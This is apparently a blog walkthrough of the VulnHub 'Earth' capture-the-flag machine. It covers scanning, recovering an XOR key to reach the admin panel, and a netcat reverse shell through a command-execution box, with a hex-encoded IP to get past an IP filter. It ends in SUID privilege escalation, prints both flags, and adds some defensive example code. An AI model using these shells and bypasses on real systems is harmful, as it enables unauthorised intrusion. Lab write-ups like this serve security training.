Preface
Target machine: vulnhub_Earth
Attacker IP: 192.168.20.121
Target IP: 192.168.20.122
Reference articles
https://www.cnblogs.com/Jing-X/archive/2022/04/03/16097695.html
https://www.cnblogs.com/wthuskyblog/p/16032277.html
https://www.cnblogs.com/CHOSEN1-Z13/p/15915195.html
Probing the target
- Scan the class C range with nmap
nmap 192.168.20.0/24
┌──(root㉿kali-purple)-[/home/kali]
└─# nmap 192.168.20.0/24
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-15 21:37 CST
Nmap scan report for 192.168.20.1
Host is up (0.00011s latency).
All 1000 scanned ports on 192.168.20.1 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.20.2
Host is up (0.00074s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE
53/tcp open domain
MAC Address: 00:50:56:FE:42:C8 (VMware)
Nmap scan report for 192.168.20.122
Host is up (0.00041s latency).
Not shown: 983 filtered tcp ports (no-response), 14 filtered tcp ports (admin-prohibited)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
443/tcp open https
MAC Address: 00:0C:29:29:AE:FF (VMware)
Nmap scan report for 192.168.20.254
Host is up (0.00018s latency).
All 1000 scanned ports on 192.168.20.254 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
MAC Address: 00:50:56:F4:37:D0 (VMware)
Nmap scan report for 192.168.20.121
Host is up (0.0000020s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE
3389/tcp open ms-wbt-server
Nmap done: 256 IP addresses (5 hosts up) scanned in 10.67 seconds
Here we can see that 192.168.20.122 is this round's target, with ports 22, 80 and 443 open.
- Use the -A option to get full service information on the target
nmap -A 192.168.20.122 -p 22,80,443
┌──(root㉿kali-purple)-[/home/kali]
└─# nmap -A 192.168.20.122 -p 22,80,443
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-15 21:44 CST
Nmap scan report for 192.168.20.122
Host is up (0.00047s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.6 (protocol 2.0)
| ssh-hostkey:
| 256 5b2c3fdc8b76e9217bd05624dfbee9a8 (ECDSA)
|_ 256 b03c723b722126ce3a84e841ecc8f841 (ED25519)
80/tcp open http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Bad Request (400)
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
443/tcp open ssl/http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Bad Request (400)
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space
| Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local
| Not valid before: 2021-10-12T23:26:31
|_Not valid after: 2031-10-10T23:26:31
| tls-alpn:
|_ http/1.1
MAC Address: 00:0C:29:29:AE:FF (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|storage-misc|specialized
Running (JUST GUESSING): Linux 5.X|4.X|3.X|2.6.X (98%), Synology DiskStation Manager 5.X (92%), Crestron 2-Series (90%)
OS CPE: cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:2.6 cpe:/a:synology:diskstation_manager:5.2 cpe:/o:crestron:2_series
Aggressive OS guesses: Linux 5.0 - 5.3 (98%), Linux 5.4 (98%), Linux 4.15 - 5.6 (97%), Linux 5.0 - 5.4 (96%), Linux 3.2 - 4.9 (94%), Linux 2.6.32 - 3.10 (93%), Linux 2.6.32 (92%), Linux 3.10 - 4.11 (92%), Synology DiskStation Manager 5.2-5644 (92%), Linux 2.6.32 - 3.13 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.47 ms 192.168.20.122
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.67 seconds
Here we can see that port 80 answers with a 400 status, and the TLS certificate on port 443 carries a DNS name:
DNS:terratest.earth.local
Website information gathering
- Edit the hosts file, /etc/hosts, so that earth.local and terratest.earth.local resolve to 192.168.20.122
- Visit the site via the domain name
Three hex-encoded keys were found on the site; the second of them is:
3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45
Scanning website directories
- Scan with dirsearch
Install it with:
apt install dirsearch
Run:
dirsearch -u terratest.earth.local/
┌──(root㉿kali-purple)-[/home/kali/桌面]
└─# dirsearch -u terratest.earth.local/
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /root/.dirsearch/reports/terratest.earth.local-_23-04-16_12-46-03.txt
Error Log: /root/.dirsearch/logs/errors-23-04-16_12-46-03.log
Target: http://terratest.earth.local/
[12:46:03] Starting:
[12:46:11] 301 - 0B - /admin -> /admin/
[12:46:11] 200 - 306B - /admin/
[12:46:11] 200 - 306B - /admin/?/login
[12:46:11] 200 - 746B - /admin/login
[12:46:18] 403 - 199B - /cgi-bin/
Task Completed
This reveals the admin area; /cgi-bin/ returns 403, so we have no permission to access it.
- Look at the admin area
A few manual login guesses show it is not a common weak password.
- Directory scan with dirb
┌──(root㉿kali-purple)-[/home/kali/桌面]
└─# dirb https://terratest.earth.local/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun Apr 16 13:11:00 2023
URL_BASE: https://terratest.earth.local/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: https://terratest.earth.local/ ----
+ https://terratest.earth.local/cgi-bin/ (CODE:403|SIZE:199)
+ https://terratest.earth.local/index.html (CODE:200|SIZE:26)
+ https://terratest.earth.local/robots.txt (CODE:200|SIZE:521)
-----------------
END_TIME: Sun Apr 16 13:11:03 2023
DOWNLOADED: 4612 - FOUND: 3
Look at robots.txt
Here we can see an unusual entry, /testingnotes.*, but the extension is unknown, so fuzz it.
- Fuzz the file extension
The dirbuster wordlist is enough; its path is:
/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
wfuzz -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt https://terratest.earth.local/testingnotes.FUZZ | grep "200"
The result is .txt, so open it:
Notes on testing the secure messaging system:
* XOR encryption is used as the algorithm; it should be as secure as when used in RSA,
* Earth has confirmed they have received the messages we sent,
* testdata.txt is used to test the encryption,
* Terra is used as the username for the admin portal,
To do:
* How do we send the monthly key to Earth securely? Or should we change the key weekly?
* Need to test different key lengths to protect against brute force; how long should the key be?
* Need to improve the messaging interface and the admin panel interface; they are currently very basic,
- Decryption
I don't really understand the crypto, so for this part I followed an expert's blog; the link is attached:
Jing-X's blog
import binascii

# The three hex strings collected from the messaging page (key1 and key3 are not preserved on this page)
key1 = ""
key2 = "3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45"
key3 = ""
# Known plaintext: the contents of testdata.txt
decode_txt = b"According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago."
testdata = binascii.b2a_hex(decode_txt).decode()
# XOR each message against the known plaintext as big integers; the printed hex is the key stream
for key in (key1, key2, key3):
    if key:
        print(hex(int(key, 16) ^ int(testdata, 16)))
Convert the hex produced by the decryption back to text
According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's hisCfy //}omo;/ppeare'2~d;f$'x,jj=*alf3,oq|y$w6&|%Qjvw+U <@f;y/jkr0~h<Pj1s.=i?q,<j${ugn$u6&*+o'erlj|mnn/?;-'1%,f{kx8.`b)"?p`ust*yzd1}xbi:o{)~sh},^6#Tjcy7aj,yn>Hhu-skl)$In*'y/dybj7pt4~u"t=5jgh&#yx*+fwi=/eapyrncanxky8/k<6=+1?*Ir8xo"P|7wfbn66??F?F嫧&2FF?W7F7F娦?プ"WfFV?V'Ff?B?B?&??V'2v?F|Rf'7B&??V'2?'Fw27F璂?fRV&VB|R暶??&Vv|?fV7BV'Fw2F?7W&R?7W&f6R?F?F?R&?&??g邧?Fr?2WvV#Cf2FFSvb6V7△??GG3痦6f'榢Cd禗?gF?G?6B?ff6WFFVR?G#?rFgg??cGGcgVFearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimat
The string earthclimatechangebad4humans repeats, so try it as the password.
For the username, look at the URL http://terratest.earth.local/admin/login
This is terra's test site, so terra is very likely one of the login usernames.
Username: terra
Password: earthclimatechangebad4humans
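An added example (not from the original post or Jing-X's blog) of what the decryption step relies on: with a repeating XOR key, XORing the ciphertext against the known plaintext position by position from the start of the message gives back the key stream, and the shortest period of that stream is the key. The message and key below are constructed for the example; the XOR is done byte by byte rather than on big integers, since integer XOR would align a shorter ciphertext with the end of the plaintext instead of its start.

```python
def xor_repeating(data: bytes, key: bytes) -> bytes:
    """XOR data against key, repeating the key for as long as the data lasts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def recover_keystream(ciphertext: bytes, known_plaintext: bytes) -> bytes:
    """Known-plaintext step: ciphertext XOR plaintext gives the key stream, aligned from byte 0."""
    n = min(len(ciphertext), len(known_plaintext))
    return bytes(c ^ p for c, p in zip(ciphertext[:n], known_plaintext[:n]))

def shortest_period(stream: bytes) -> bytes:
    """Shortest prefix that, repeated, reproduces the whole stream (the repeating key itself)."""
    for period in range(1, len(stream) + 1):
        if all(stream[i] == stream[i % period] for i in range(len(stream))):
            return stream[:period]
    return stream

def recover_key(message_hex: str, known_plaintext: bytes) -> bytes:
    """Recover the repeating key from a hex-encoded message and the plaintext it was made from."""
    return shortest_period(recover_keystream(bytes.fromhex(message_hex), known_plaintext))

# Constructed sample: the key the walkthrough ends up with, applied to one sentence of testdata.txt.
SAMPLE_KEY = b"earthclimatechangebad4humans"
SAMPLE_PLAINTEXT = (b"According to radiometric dating estimation and other evidence, "
                    b"Earth formed over 4.5 billion years ago.")
SAMPLE_MESSAGE_HEX = xor_repeating(SAMPLE_PLAINTEXT, SAMPLE_KEY).hex()

if __name__ == "__main__":
    print(recover_key(SAMPLE_MESSAGE_HEX, SAMPLE_PLAINTEXT))  # b'earthclimatechangebad4humans'
```

Any message longer than the key that is sent with a known or guessable plaintext leaks the whole key this way, which is why the "as secure as RSA" note in testingnotes.txt is wrong.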
Vulnerability discovery and exploitation
Finding the vulnerability
After the information gathering we made it into the admin area, which contains a command-execution input box.
The privileges turn out to be low.
Reverse shell
Through the RCE we use nc to push a shell straight back to the attacking machine:
nc -nv 192.168.20.128 6666 -c bash
Start a listener on kali
The kali_linux IP was later changed to 192.168.20.128
At first I thought there was a port restriction; after reading write-ups online it turned out the server side uses a regex to match the digits of the IP address.
find / -name "*.py" -type f | xargs grep "Remote connections are forbidden"
cat /var/earth_web/secure_message/forms.py
Convert the IP address to hexadecimal and the reverse shell works:
nc -nv 0Xc0a81480 6666 -c bash
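The bypass works because the server-side filter looks for dotted-decimal text while the resolver accepts every numeric form inet_aton understands. As an added example from the defender's side (not the box's forms.py, whose regex the page does not reproduce; the weak check below is a hypothetical reconstruction), this canonicalises each token of a command to its 32-bit IPv4 value before deciding, so hex, decimal and octal spellings of 192.168.20.128 are all recognised as the same address.

```python
import re
from typing import Optional

# Hypothetical weak check in the spirit of the "Remote connections are forbidden" filter
# (not the box's actual forms.py): it only knows dotted-decimal text, so a hex literal is never seen.
DOTTED_QUAD = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

def weak_contains_ip(command: str) -> bool:
    return DOTTED_QUAD.search(command) is not None

def _c_number(part: str) -> Optional[int]:
    """Parse one part the way C inet_aton does: 0x hex, leading-zero octal, otherwise decimal."""
    if re.fullmatch(r"0[xX][0-9a-fA-F]+", part):
        return int(part, 16)
    if re.fullmatch(r"0[0-7]*", part):
        return int(part, 8)
    if re.fullmatch(r"[1-9][0-9]*", part):
        return int(part)
    return None

def ipv4_value(literal: str) -> Optional[int]:
    """32-bit value of an IPv4 literal in any inet_aton form (a.b.c.d, a.b.c, a.b or a), else None."""
    parts = literal.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    nums = [_c_number(p) for p in parts]
    if any(n is None for n in nums):
        return None
    leading, last = nums[:-1], nums[-1]
    last_bits = 8 * (5 - len(parts))  # the final part fills every remaining byte
    if any(n > 255 for n in leading) or last >= 1 << last_bits:
        return None
    value = 0
    for n in leading:
        value = (value << 8) | n
    return (value << last_bits) | last

def hardened_contains_ip(command: str) -> bool:
    """Canonicalise every token first, so hex, decimal and octal spellings are caught as well."""
    return any(ipv4_value(tok) is not None for tok in re.split(r"[\s,;|&<>]+", command) if tok)

# Constructed inputs: the two reverse-shell command lines from the walkthrough.
DOTTED_CMD = "nc -nv 192.168.20.128 6666 -c bash"
HEX_CMD = "nc -nv 0Xc0a81480 6666 -c bash"

if __name__ == "__main__":
    for cmd in (DOTTED_CMD, HEX_CMD):
        print(cmd, "| weak:", weak_contains_ip(cmd), "| hardened:", hardened_contains_ip(cmd))
```

Bare integers such as the port are themselves valid single-number literals (6666 is 0.0.26.10 to inet_aton), so even the hardened check over-matches on command text; the durable fix is never handing user input to a shell at all.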
Find the flag
find / -name "*flag*"
cat /var/earth_web/user_flag.txt
[user_flag_3353b67d6437f07ba7d34afd7d2fc27d]
SUID privilege escalation
find / -perm -u=s -type f 2>/dev/null
Running it gives an error
Use nc to transfer the file back to the local machine for testing
# On the attacker, start listening first and write what arrives to a file
nc -lnvp 1234 > reset_root
# On the target, send the binary to the attacker
nc 192.168.20.128 1234 < /usr/bin/reset_root
Give it permissions with chmod 777 reset_root
Then debug it with strace
Install strace before running:
apt install strace
strace ./reset_root
We can see it is missing these three files
Create the three files with touch and run reset_root again; the root password is reset to Earth:
touch /dev/shm/kHgTFI5G
touch /dev/shm/Zw7bV9U5
touch /tmp/kcM0Wewe
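An added example (not from the original post) of the triage the strace step does by hand: parse the trace for file checks that fail with ENOENT under world-writable directories, which is exactly the condition that lets an unprivileged user supply the files a SUID binary expects. The strace excerpt is constructed to match the output format, with the three paths the walkthrough found; it is not real output from reset_root.

```python
import re
from typing import List, Optional, Tuple

# Constructed strace excerpt in the shape `strace ./reset_root` prints (not real output from the
# box); only the three trigger paths come from the walkthrough.
SAMPLE_TRACE = """\
execve("./reset_root", ["./reset_root"], 0x7ffc1a2b3c40 /* 20 vars */) = 0
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib64/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
access("/dev/shm/kHgTFI5G", F_OK) = -1 ENOENT (No such file or directory)
access("/dev/shm/Zw7bV9U5", F_OK) = -1 ENOENT (No such file or directory)
access("/tmp/kcM0Wewe", F_OK) = -1 ENOENT (No such file or directory)
write(1, "reset failed\\n", 13) = 13
exit_group(0) = ?
"""

# Directories every local user can write to; a SUID binary trusting files here is the audit finding.
WORLD_WRITABLE = ("/tmp/", "/var/tmp/", "/dev/shm/")

FILE_SYSCALL = re.compile(
    r'^(?:access|stat|lstat|open|openat)\((?:AT_FDCWD, )?"([^"]+)"[^)]*\) = (-?\d+)(?: (E[A-Z]+))?'
)

def parse_file_syscalls(trace: str) -> List[Tuple[str, int, Optional[str]]]:
    """(path, return value, errno name or None) for every file-touching syscall line."""
    rows = []
    for line in trace.splitlines():
        m = FILE_SYSCALL.match(line)
        if m:
            rows.append((m.group(1), int(m.group(2)), m.group(3)))
    return rows

def missing_writable_paths(trace: str) -> List[str]:
    """Paths the binary looked for, did not find, and which live in a world-writable directory."""
    hits: List[str] = []
    for path, _ret, err in parse_file_syscalls(trace):
        if err == "ENOENT" and path.startswith(WORLD_WRITABLE) and path not in hits:
            hits.append(path)
    return hits

if __name__ == "__main__":
    for p in missing_writable_paths(SAMPLE_TRACE):
        print("unprivileged user can create:", p)
```

The same check run against a real `strace -f -e trace=file` capture of a SUID binary is a quick way to spot this class of weakness before an attacker does.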
With privilege escalation done, view the flag in the root directory
[root_flag_b0da9554d29db2117b02aa8b66ec492e]
Please credit the source when reposting. Original link: https://www.uj5u.com/qita/550570.html
Tags: other